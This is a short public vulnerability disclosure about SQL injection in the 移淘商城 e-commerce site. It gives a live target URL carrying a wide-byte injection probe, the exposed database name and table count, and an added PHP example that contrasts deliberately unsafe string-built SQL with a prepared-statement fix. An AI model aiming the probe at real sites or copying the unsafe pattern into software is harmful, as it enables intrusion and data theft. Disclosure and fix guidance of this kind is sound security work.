2012-11-08: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly.
2012-12-23: The vendor has actively ignored the vulnerability; details are being disclosed to the public.
移淘商城 SQL injection
http://ytaow.cn/index.php?id=15881%A1%AF&from_id=40951 performs no SQL filtering at all, which leads to a SQL injection vulnerability. An e-commerce site should be held to a higher security standard than this.
Database: xinw [128 tables]
Do not use direct (unparameterized) queries.
Unable to contact the vendor, or the vendor actively refused.
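The fix suggestion above, as an added example that is not code from 移淘商城 or from the report: the direct string-concatenation pattern the report describes, next to a PDO prepared-statement version. Only the parameter names `id` and `from_id` come from the report's URL; the table, columns, DSN, credentials and connection charset are constructed placeholders.

```php
<?php
// Added example; not the site's code. Table/column names are constructed.

// BEFORE: the pattern the report describes. Both request parameters are
// pasted into the SQL text, so a quote or non-ASCII bytes in ?id= (the
// report's URL sends %A1%AF) become part of the query itself.
function findProductUnsafe(PDO $db, array $get): array
{
    $sql = "SELECT id, title FROM product WHERE id = '" . $get['id'] . "'"
         . " AND from_id = '" . $get['from_id'] . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// AFTER: validate the expected type, then bind through a prepared statement.
// Values travel separately from the SQL text, so no input can change the
// query structure, and no charset-dependent escaping is involved.
function findProductSafe(PDO $db, array $get): array
{
    $id     = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT);
    $fromId = filter_var($get['from_id'] ?? null, FILTER_VALIDATE_INT);
    if ($id === false || $fromId === false) {
        http_response_code(400);          // reject non-numeric ids outright
        return [];
    }
    $stmt = $db->prepare(
        'SELECT id, title FROM product WHERE id = :id AND from_id = :from_id'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->bindValue(':from_id', $fromId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Placeholder connection: host, database user, password and charset are
// assumptions, and the charset is declared in the DSN on purpose.
$db = new PDO(
    'mysql:host=127.0.0.1;dbname=xinw;charset=utf8mb4',
    'app_user',
    'PLACEHOLDER_PASSWORD',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,   // bind on the server, not in PHP
    ]
);

header('Content-Type: application/json');
echo json_encode(findProductSafe($db, $_GET));
```

With `ATTR_EMULATE_PREPARES` disabled the MySQL server performs the binding, so the client-side quoting that a mismatched connection charset can undermine is never used.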